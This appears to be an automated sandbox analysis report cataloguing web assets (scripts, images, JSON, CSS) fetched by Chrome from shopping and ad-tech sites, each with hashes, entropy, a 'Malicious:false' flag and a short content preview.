                                                                                                                                                                                    SHA1:BEB170DF2E222AE4986B2EA37C831D5BBDED7CA7
                                                                                                                                                                                    SHA-256:8D3C4D95BD12A93083457A6016BBC62EC5CB493E76B234464485882A68FACD94
                                                                                                                                                                                    SHA-512:9980F2DC0E396E430747A83476D4A110C97CC7C68B6EC3F46A1D6BF23611D801C87BF62F2F5881DD0EE83899EA00FAE56270719B392C1E2E26F4C6F27916E996
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useUnauthenticatedErrorModal.AwvSMfsF.js
                                                                                                                                                                                    Preview:import{c as d,d as p,cs as f,D as g,T as y,lw as S,v as C,l as b,aO as v,q as k,cx as h,cB as w,cI as P}from"./app.DfgMZONA.js";var E=(o=>(o.Generic="generic",o.SignInFailed="sign_in_failed",o.ContinueWithShopPay="continue_with_shop_pay",o))(E||{});const I=d(null);function x(){return p(I)}const M=o=>({backgroundColor:e,foregroundColor:n})=>{const s=m(e),t=m(n),a=Math.max(s,t),r=Math.min(s,t),c=(a+.05)/(r+.05);return{isValidContrast:c>=o,ratio:Math.round(c*100)/100}},_=M(3.06);function m(o){const n=o.toRgbTuple().map(s=>{const t=s/255;return t<=.04045?t/12.92:((t+.055)/1.055)**2.4});return .2126*n[0]+.7152*n[1]+.0722*n[2]}const u=new S(0,0,100);function A({foregroundColor:o,backgroundColor:e,section:n="main"}){const s=f(),{colors:t}=g(),a=s[n];let r=u;if(e!==void 0)r=e;else if(a.colorScheme==="inherit"){const{background:i,colorScheme:l}=s.canvas;l&&i!=="transparent"&&(r=t.schemes?.[l]?.base?.background??u)}else{const i=a.colorScheme;r=i?t.schemes?.[i]?.base?.background??u:u}const{isVali
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 53 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                    Entropy (8bit):7.675444146643591
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1dgn2T0Y/B063VaQ5n8uGcT2/hZeH6L3Ty9waHrzcZP:tZRa3uGEMP/L8zHrsP
                                                                                                                                                                                    MD5:61BC22940B2D881904D635FF986DD311
                                                                                                                                                                                    SHA1:44B1AF19D33667F5E84AD4A24E7A0397B83E744B
                                                                                                                                                                                    SHA-256:97CA822F1843CA7450B83B7CBAA37B99ABFA48DCC5F807CD3D5B4ABC8EE9B0FE
                                                                                                                                                                                    SHA-512:B6CCEE9143097EB4E295327887B45614400B2292B5508570CF3AECB48085A5D137423F9500BFAFE0929D20E0F32DEFD0BD6E23F63A054817B8390155AF8D0A2E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR...5...&.....Sz#w....PLTE..............................j'(~~~.=>.rr.VV.hh..?e.DW...__......LL.DD..j.........eu.3F.$7....Vg...........+..#.....2.$Q...........................................'I.Z....orNT..w....HIDATH..][.0....l.|I.&.(bE`.A.......$m..q..}'.M{..s:..@7..^..Cs.....ppr..........1..s.1%.tx...0.1!."e.8O3.P....:a.I....p9!.3..w.TH..&....R.H...G....2._.....!F.)h).Rp.N....zr]1m..3)z0Y....*n.n*.7>..4HAg.!.........]..Un...|q...o..0K..n..Q*CJ.LS:.;/..X.`..*.fU.....!..i...|>_@M-........5LHYB.nL>.U.. .6,.g.s..8.8.m.\.Y6..\B.*A:....fR..+...K..E.k..1.cL).c.....c...We..D.8..'.cI`.3.cz.zB!..>....N.......T.`uok.^Y..8..W.=..(.o......}.<.....9....~.%.9Eao.W..(..V.S.<'e..5O...V....m.x6e..#..]..).n.s.v3.x.e..V.E..*...{U.m.b.w..i.r.T.......1.(...y.......{.......`s(.Eq.|.%....Lr....8.....IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (14547)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14859
                                                                                                                                                                                    Entropy (8bit):5.422245602304736
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:ys9X0SCg8UoDthaNyvhCV/KJKWrKFKiL2LKIQNvdNFKyRCLJTsK54:tdCDLDthDQL2IhR8TC
                                                                                                                                                                                    MD5:ED7158A43AFBBE74050CBCD00342CB0B
                                                                                                                                                                                    SHA1:3E429B1B69F91170EE2D2B826F452010FF4D7D30
                                                                                                                                                                                    SHA-256:410E1DF7390B246A2EF4F1D3A511190ED8E724042AEC32DF46E7577E3A95EBC6
                                                                                                                                                                                    SHA-512:89A0BF2FF978E7C380CF2F695C1D65F961E65E9E9F16728F9794851CC4CC6DF8F9C9B1E97FADB18B0D6FCB55AECADE6632028711224DFA894A1DE14E55117FAD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://gum.criteo.com/syncframe?topUrl=www.overstock.com&origin=onetag
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head>. <script type="text/javascript">. window.CONFIG_CSM_DOMAIN_NAME = "csm.nl3.eu.criteo.net";. window.CONFIG_CSM_RATIO = 100;. window.GUM_DOMAIN = "gum.criteo.com";. </script>. <script type="text/javascript">. !function(){"use strict";var i=function(t,e){return(i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)};function t(t,e){function n(){this.constructor=t}i(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var e=function(){return(e=Object.assign||function(t){for(var e,n=1,i=arguments.length;n<i;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)};function n(r,s,a,l){return new(a=a||Promise)(function(t,e){function n(t){try{o(l.next(t))}catch(t){e(t)}}function i(t){try{o(l.throw(t))}catch(t){e(t)}}function o(e){e.done?t(e.valu
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7546
                                                                                                                                                                                    Entropy (8bit):4.055311714128706
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:t1pWDQF0BjSfrcD2ae8R8ego7+g8ZHpKsGEyKSe2t+:tTWM0ofZae8megoNcKsGEyw
                                                                                                                                                                                    MD5:98C83D05C80E256B4628F4EA12E8A786
                                                                                                                                                                                    SHA1:EF0F1237EEFCAE6CEA0329C5041A9DD7AFA00252
                                                                                                                                                                                    SHA-256:8FCF4706E403364413AEE225F32E766299617D0A7E2C987E21AFC3CC0EAC889B
                                                                                                                                                                                    SHA-512:F2FA11159F86935D84DC281A0B0F32F1FC6FB87A3FE887D3958EA15579414F484C3E379EE266E2212B0A45289FCEFBDB8C29538911ACC333BB037FC435DAA419
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/OMNI_ENTRY_COUPON_15_20240508.svg
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="179" height="66" fill="none">. <g clip-path="url(#a)">. <mask id="b" width="179" height="66" x="0" y="0" maskUnits="userSpaceOnUse" style="mask-type:luminance">. <path fill="#fff" d="M179 0H0v66h179V0Z"/>. </mask>. <g fill="#D90023" mask="url(#b)">. <path d="M142.197 61.47a9.81 9.81 0 0 1-3.862-.718 8.228 8.228 0 0 1-2.866-1.974 8.446 8.446 0 0 1-1.781-3.006 12.28 12.28 0 0 1 0-7.652 8.448 8.448 0 0 1 1.781-3.007 8.247 8.247 0 0 1 2.866-1.973 10.757 10.757 0 0 1 7.725 0 8.253 8.253 0 0 1 2.865 1.973 8.488 8.488 0 0 1 1.783 3.007 12.28 12.28 0 0 1 0 7.652 8.486 8.486 0 0 1-1.783 3.006 8.224 8.224 0 0 1-2.865 1.974 9.829 9.829 0 0 1-3.863.717Zm0-3.146a4.566 4.566 0 0 0 2.315-.56 4.806 4.806 0 0 0 1.607-1.467c.427-.622.74-1.314.927-2.045a9.17 9.17 0 0 0 0-4.63 6.174 6.174 0 0 0-.927-2.043 4.927 4.927 0 0 0-1.607-1.452 5.024 5.024 0 0 0-4.612 0 4.93 4.93 0 0 0-1.609 1.452 6.195 6.195 0 0 0-.927 2.044 9.192 9.192 0 0 0 0 4.6
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):108069
                                                                                                                                                                                    Entropy (8bit):3.725869234959433
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:WXyuhxZazsWBvlms4pPP3R4IYHQI9tdkXs4pPP3R4IYHQI9tdkz:7hrhq
                                                                                                                                                                                    MD5:CE0B9D42D09F9C7DA3D4E819FC40F585
                                                                                                                                                                                    SHA1:CB0F2094B3DD1F86AA8A2494D441385FC9D03C79
                                                                                                                                                                                    SHA-256:30D76FF12CD090349C2FAB43811F43CF68EB397FA535B724FFA671540C96FBC8
                                                                                                                                                                                    SHA-512:E20889882645547E693639D05A972095D0F885D3111B3F978A21C92261882A31052B7568B6F0CABAB4D71CF3FC392A4DDB2797DAC8225464E49CA2FB75909DF2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="327" y="175" width="152.324" height="152" rx="76" fill="#832E00"/>.<path d="M384.676 215.188H388.078V224.758H384.676V223.238C383.864 224.429 382.448 225.103 380.738 225.103C377.957 225.103 376.454 223.324 376.454 220.819V215.188H379.857V220.595C379.857 221.838 380.565 222.564 381.86 222.564C383 222.564 383.95 222.028 384.676 220.854V215.188ZM397.832 225.103C396.087 225.103 394.74 224.429 393.894 223.341V228.212H390.491V215.188H393.894V216.588C394.74 215.517 396.087 214.826 397.832 214.826C400.837 214.826 402.91 216.795 402.91 219.973C402.91 223.134 400.837 225.103 397.832 225.103ZM396.882 217.434C395.725 217.434 394.671 217.831 393.911 218.798V221.13C394.671 222.098 395.725 222.495 396.882 222.495C398.678 222.495 399.68 221.562 399.68 219.973C399.68 218.367 398.678 217.434 396.882 217.434ZM416.321 221.959L416.891 224.188C416.027 224.775 414.68 225.12 413.523 225.12C411.346 225.1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1573)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1650
                                                                                                                                                                                    Entropy (8bit):5.036461110460696
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:BpMMSulesMMn30qThCDetdGEEMnoThMnCDhCexN7:B6MSulezqThEe3EVThHxh
                                                                                                                                                                                    MD5:6D1918BC50BA3A6188B26491DFF622BC
                                                                                                                                                                                    SHA1:6A2DAB51ABEE8FD498B327C4E1D36097B73FBA5E
                                                                                                                                                                                    SHA-256:6302E16C255F2B7C46B1B832E97945E5DEE8E0ACB8CC4E40C4C06D9608A3A45D
                                                                                                                                                                                    SHA-512:64A5AAFAFA67F33ADB3198ADBF33874D015A258A567B32457E4C0731EAC555BDEC5D8F646EB449AB6943A90EA0F77F59000B9EBB6509317446E48DA86971BEC9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){var __sections__={};(function(){for(var i=0,s=document.getElementById("sections-script").getAttribute("data-sections").split(",");i<s.length;i++)__sections__[s[i]]=!0})(),function(){if(__sections__.footer)try{customElements.whenDefined("details-disclosure").then(()=>{class FooterMenu extends DetailsDisclosure{constructor(){super(),this.reset(!1),window.addEventListener("on:breakpoint-change",this.reset.bind(this))}reset(){const isLargeScreen=window.matchMedia(theme.mediaQueries.md).matches,isConfirmNewsletter=!isLargeScreen&&window.location.hash==="#footer-signup_form"&&this.querySelector("#footer-signup_form")!==null;this.disclosure.open=isLargeScreen||isConfirmNewsletter,isLargeScreen?this.toggle.setAttribute("tabindex","-1"):this.toggle.removeAttribute("tabindex")}}customElements.define("footer-menu",FooterMenu)})}catch(e){console.error(e)}}(),function(){if(__sections__.header)try{customElements.whenDefined("details-disclosure").then(()=>{class NavMenu extends DetailsDis
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (21468)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):21625
                                                                                                                                                                                    Entropy (8bit):5.3491863162376205
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Oa6/BkmIoJszJpVmqyQBYksQt2oqwZHiNtmIQcEafpe602t/9:ObMGqtHiNkIwa7D7
                                                                                                                                                                                    MD5:2D0937E23561575439EED5E8C7BB9614
                                                                                                                                                                                    SHA1:278FA8727E4E6A5CD03441754F239523BE30318A
                                                                                                                                                                                    SHA-256:2516921CD1002C695846942CE0D42DF5DB33C33803198827F5A24DE3D1246CAC
                                                                                                                                                                                    SHA-512:FD86DBA77F7A2D74C1F044DA856BBB8FC9223534AE0033113C13B88782406174B2EBED84D33F3768B09997B1328E7B370A1EC0B3561D4F40377454FB5DA8B6A7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/** @license. Uses code from stringencoders and fingerprintjs2. See https://prod.accdab.net/static/js/uba_opensource_readme.txt for license information.. */.!function(t){"use strict";try{!function(t){var e,n,r,i,a,o,u,s,c,l={beacon:{domain:"https://prod.accdab.net",url:"https://prod.accdab.net/beacon",session_ttl:60,frame_source:"https://prod.accdab.net/beacon/bf/bf.html?v=202009_01",api_ns:null},token:{ttl:60,key:"_bcntkn",client_key:"_bcnctkn",form_id:"_bcnToken"},client:{id:"kqScQcdGSSaI3dBtp4jwEFQjXsQ",forms:[]},events:{send_interval:1e4,max_page_buffer_time:2e4,max_page_buffer_size_bytes:1048576,mtrk_threshold:{time:250,dist:50},strk_threshold:{time:250}},dvc:{host:"www.cdn-net.com",sid:"306fdaffb6c5a968",flags:null,to:500,ns:null}},f=(n=t.navigator,r="Microsoft Internet Explorer"===n.appName,i=(e=/MSIE ([0-9]{1,}[.0-9]{0,})/.exec(n.userAgent))?parseFloat(e[1]):0,!r||r&&i>=9),d=(u=(o=function(t){return void 0!==t})((a=t).Prototype)&&a.Prototype.Version<"1.7"&&o(Array.prototype.toJ
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4724), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4724
                                                                                                                                                                                    Entropy (8bit):5.328172600275533
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:ymki6KoVDicZwrdAmw2Iw2KCpPOzOcKQa+sC:4Wr6mw2Iw2KsPOqdDC
                                                                                                                                                                                    MD5:4CCF43771E48481ABCD9B2BCBDBD27ED
                                                                                                                                                                                    SHA1:94E18935A8B2E9BD8208B9C4C16751B49908DAEF
                                                                                                                                                                                    SHA-256:3CA9E609EF3F582AEC6955E30DE3EA1A0A33186BF6B10105D9E8391C4BA8AD21
                                                                                                                                                                                    SHA-512:2247C0CD89A6110AAED3086C3F5C277D8B1984337DF18B39AB09DA2CAE994DD4CCCBD44063EC7FA4FBFE7855A646403AB880670D1DA88FF8389E32717D1E460B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(async function(){const a="rtbhEvents",b="__rtbh.",c=["uid","sid","aid","eid"],d=[...c,"lid"],e=31536000000,f=[];if(Array.isArray(window.rtbhEvents)||(window.rtbhEvents=[]),window.rtbhEvents.length&&!window.rtbhEvents.push.prototype)try{function g(a){return!!a&&new Date(a)<new Date}function h(){return new Date(new Date().getTime()+e).toISOString()}function i(a,b="ams"){return null===a?void 0:function(c,e,f=null){try{const g=e.filter(a=>!d.includes(a.eventType)&&"init"!==a.eventType);return k(`https://${b}.creativecdn.com/tags/v2?type=json`,{method:"POST",mode:"cors",credentials:"include",referrerPolicy:"no-referrer-when-downgrade",headers:{"Content-Type":"application/json"},redirect:"follow",body:JSON.stringify({...j(a,f),tags:[...g,...z]})},c)}catch(a){}}}function j(a,b=null){const c=document.referrer?document.referrer:"";return{v:"v0.1.9",sr:c,su:location.href,th:b?b:a}}async function k(a,b,c,d){try{const e="function"==typeof c?c:()=>{},f=await fetch(a,b),g=f.status;if(200<=g&&300>g)
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):29086
                                                                                                                                                                                    Entropy (8bit):7.977378419437149
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Tjh5jhvVsY288aeO+AZXhOM1/M8D8cULbFouBwQpDYVLBgfVW9qyaUz2Fung0miO:TjfZP2nYVZXN1dD8cuUUFVE1guez
                                                                                                                                                                                    MD5:02CE5CC478796407F6AA9EA72D863BC0
                                                                                                                                                                                    SHA1:242D6DEBFEB4C2BA46B42F6E8B3F65A54EF9B517
                                                                                                                                                                                    SHA-256:697F946309B9592871B0162280DAB931A48EE838B3A0CCAE55915ADC7ACBE66A
                                                                                                                                                                                    SHA-512:E551F38BEFD06C252F1D1CC0CEBD7A77544B197808795EB011AD99A47CDC25C496D99859B4E2CD9582D22C0F80BD950B54E7C3470DF7058EBFC4A12DD3F321D0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/collections/ZULILY_-AD-2_150b6bb3-790a-4fd1-8137-2cafb4108e90.jpg?v=1730170481&width=800
                                                                                                                                                                                    Preview:RIFF.q..WEBPVP8X....(...K.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .o.......*L...>=..D.!."..yHP..enP..q.9..O./.J%a.z.-.+.... ..."....}...a..si....>.......y.s.....>=..a...u.....I.................k.....7.................?.........Y.o...?...?...................p.<.....W..<.........].>n.....g........../....A.....o..._....#_m.o.....z.z....?.....g.7..N~......[.;.G......9...............a........'._..........7._.?............#........>.?..........S..k.....Y|..A@-M....KvS.s.7....R......._z..9`.NnK."...{..".A).c.X.'.o.e..0...2..Yb.k.-.....Sh....0........>..a..6...J..d&[?...8...|...?
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):143
                                                                                                                                                                                    Entropy (8bit):4.659452476607608
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnB32hcOfMNx2JTJb364TJiWzQVQsLVn:YWtIkW/fAnB3AcO0D2JTt5TQW6LVn
                                                                                                                                                                                    MD5:7EBE82C14F2864A86CEB7309B2B79E16
                                                                                                                                                                                    SHA1:0BD09D7AD870F22150018B6D69640445ACC9DB88
                                                                                                                                                                                    SHA-256:89B89DAEF13ED6CB513B75CFE3F0E3025C0E85193E3B087879A0EBEA162A80B8
                                                                                                                                                                                    SHA-512:1DD2F724E6188DB0D73D65EF3A21F1129A588CDAEEFDD98D68F1AEFA47B13B2CE912BE37DF7CBFDF7B7407EF4EE2CEEB031DA939AE82B4ACF09CA525AD0938F1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/35648849/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"35648849","rollup":{"average_rating":3.75,"rating_count":8,"review_count":8,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):142
                                                                                                                                                                                    Entropy (8bit):4.635171964513492
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnBzQilcOfMX2Je+Tk64evQVQsLVn:YWtIkW/fAnBzvcO0X2JTY7LVn
                                                                                                                                                                                    MD5:2017DB9BA9E10C9266D2F2C507CEF1CF
                                                                                                                                                                                    SHA1:83D829A206FBBE780B1772A319DDBBB12F75D3F0
                                                                                                                                                                                    SHA-256:0D9524B3AF62E8520BCC301723A15AC1BCB84949C06B1549CD8A3E6C65BFECE6
                                                                                                                                                                                    SHA-512:013BE030651466F127930945CF588ABC57778B1EF8F1B3A26098A1CA1B457992EAC92835DBD1DF677FA07B61F52F9C2AE250A9A4A3099BF2E4B881393A41B8C1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"39225740","rollup":{"average_rating":3.2,"rating_count":5,"review_count":5,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 588 x 460, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):381044
                                                                                                                                                                                    Entropy (8bit):7.988628177847676
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:S8upd1l2I1irFCpiXt5E1RMmnH7DoyflN4hgHsKOw6HXIzIm0mm0kdyvqSQIMSxq:Xup/l2KiR95E1WmHpflN4QsP3DbydCl1
                                                                                                                                                                                    MD5:FA49E00A159D70B8FB0F9511BCD3325B
                                                                                                                                                                                    SHA1:F174D66BC42044E79078C52965E8586104816BF9
                                                                                                                                                                                    SHA-256:216391D5B587E965911C36CE28090069760954458B5B954DC158392513C71A17
                                                                                                                                                                                    SHA-512:E55D2E59115ABA4BFBF0BC9A7E6810AF7EFF6796F0518A11C5AA4E61526943C022B97509D5ABE2CE62EDC7BEF1861668072D74F039CCBD0662420A70577BCFC2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR...L.........'<......eXIfII*...........................V...........^...(...........<.......f...i.......p........w.......w......imagery4............0210....................L...................:>q,....iCCPicc..x.c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M.C%<F....pHYs..........+.... .IDATx..Y.eIz.."b.g>w.9..........0(Y.).P.,. ....._Q..~...O.a..!..l..I..I...R..YYY.U...7.=.9{..?.}b...d?.....9gO._|....E....RJ0. .....R..~G.AQ..R".C.! .P..T?3.. ...!.<....s.B....c.RV.R..(...gFQ.....V..B.1.B.8...,..A_..,}<}}.s(.`.U..g..},.z..5./.3..E........sH)A....z/!.v^...AR..gID.D.....!...C..H..~.~.#......,..S...T...y..|.k0.6_..>'...c....(..y.cJ.%=f.........c..A.....H)!....!.6"..+.D...Y. ..K.8w.gA....!.4 .....cG.A..P.V>@.:./..7z..! ...9...P..-C...."...r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (28793)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):388484
                                                                                                                                                                                    Entropy (8bit):5.561334693227936
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:dZwYXRD2uwiztG3ETAato9y0g5CptDY8/I8+yq/OUYhcDmKD0C8Gp/TRdcNG:dZwYt2KG3gPto4M+GUTx0C8Gp/TRmw
                                                                                                                                                                                    MD5:5A06311836A9C67A226C05C38A48EDCC
                                                                                                                                                                                    SHA1:76CDE4FD527204C954679A29D0C56C999E51163D
                                                                                                                                                                                    SHA-256:6685577FB32EEFA1B3B883068E44354A317B73C75805EA3A60FCC34281D78024
                                                                                                                                                                                    SHA-512:66641EAD96C1367D1AFDB0BFD95E9D44910C7F0150C9E1AEED77487738973AC65E949817203F1573884057610BFFBF65E8B5F142F04D924C48B569C65044E286
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-PB5QQF3D
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"134",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"product"},{"function":"__jsm","vtp_javascript":["template","(function(){if(",["escape",["macro",1],8,16],"){if(",["escape",["macro",1],8,16],".productTaxonomy){var a=",["escape",["macro",1],8,16],".productTaxonomy[0];var b=",["escape",["macro",1],8,16],".productTaxonomy[1];var c=",["escape",["macro",1],8,16],".productTaxonomy[2];var d=",["escape",["macro",1],8,16],".productTaxonomy[3];var e=",["escape",["macro",1],8,16],".productTaxonomy[4]}else a=",["escape",["macro",1],8,16],".category,b=",["escape",["macro",1],8,16],".category2,c=",["escape",["macro",1],8,16],".category3,d=",["escape",["macro",1],8,16],".category4,e=",["escape",["macro",1],8,16],".categor
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):278
                                                                                                                                                                                    Entropy (8bit):4.9143340189187565
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:0eJIvmeqVzXNhpKXaUhMi9L74hRFQqEvcSKg+hs2XmYLIWROU:0upV7NhpKXaUhL9L7obzEvTKg+hs2XmO
                                                                                                                                                                                    MD5:688A714B0E1E48BD1370C7D61D509128
                                                                                                                                                                                    SHA1:CB68181328E224034EC5372E262E326BFBB28B5D
                                                                                                                                                                                    SHA-256:9E416637D6805204B00864F05487ACCBCA42BC0522CA09618A6466E09FF70D10
                                                                                                                                                                                    SHA-512:A5AC054303E4B05F91A04A7258337566D865824EEB0B0C393F1A71BC41AA72733DCBDB13C2A2B3E223B2609CE0EFDA71A5B724951DCAE671FF8485E4EF4B40DF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/useAmazonContact.D-Ox6Dnf.css
                                                                                                                                                                                    Preview:.sqcDF{z-index:200}.z2IIo{display:flex;align-items:center;padding:var(--x-option-list-block-padding) var(--x-option-list-inline-padding)}.qi1py{border-top:0;min-height:5.7rem}.pcf8k{border-top:1px var(--x-default-color-border) var(--option-list-border-style);min-height:7.4rem}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):82228
                                                                                                                                                                                    Entropy (8bit):7.99464158908563
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:6pmeWh5UIO0XTvJ86+5M1ya4eyhY9ZjsrRkm7SYYAFA4PA+SQ7Y3k:OmL5U4DJn+u14ojsGKYIA4wQ80
                                                                                                                                                                                    MD5:60B5A51BFD1757707FCA3033B9E1B865
                                                                                                                                                                                    SHA1:7F29875A18B00ADBB4DF1CEFA8617B084C6A35FC
